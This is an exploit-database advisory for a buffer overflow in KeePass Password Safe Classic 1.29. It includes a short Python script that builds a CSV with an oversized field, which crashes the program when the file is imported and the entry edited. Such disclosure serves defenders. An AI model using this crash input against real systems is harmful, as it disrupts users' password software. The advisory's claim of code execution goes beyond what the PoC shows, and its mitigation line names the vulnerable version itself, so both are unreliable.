KeePass Password Safe Classic 1.29 - Crash Proof Of Concept

vendor:

KeePass Password Safe Classic 1.29

by:

Mohammad Reza Espargham

7,8

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: KeePass Password Safe Classic 1.29

Affected Version From: All Version

Affected Version To: All Version

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 / Server 2008

2020

KeePass Password Safe Classic 1.29 – Crash Proof Of Concept

A buffer overflow vulnerability exists in KeePass Password Safe Classic 1.29 due to improper bounds checking of user-supplied data. An attacker can leverage this vulnerability to execute arbitrary code in the context of the application. This vulnerability is due to a lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length buffer. An attacker can exploit this vulnerability by supplying a specially crafted file to the application. This can result in a denial of service condition or the execution of arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of KeePass Password Safe Classic 1.29

Source

Exploit-DB raw data:

# Title : KeePass Password Safe Classic 1.29 - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : keepass.info
# Tested on Windows 7 / Server 2008
# Download Link : http://sourceforge.net/projects/keepass/files/KeePass%201.x/1.30/KeePass-1.30.zip
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham
#
#
# 1 . run python code : python crash.py
# 2 . open “KeePass”
# 3 . File —> New (Create New Password Database)
# 4 . File —> Import —> CSV File…
# 5 . open r3z4.csv
# 6 . Right Click on “R3Z4” username and edit
# 7 . Crashed ;)



#!/usr/bin/env python
hdr = '"' #start syntax
hcr = "R3Z4" #user
oth = ',"' #user
oth2 = '","",""' #user
val=','
crash = "\x41"*199289 #B0F
exp = hdr+hcr+hdr+val+hdr+hcr+hdr+oth+crash+oth2
file = open("r3z4.csv", "w")
file.write(exp)
file.close()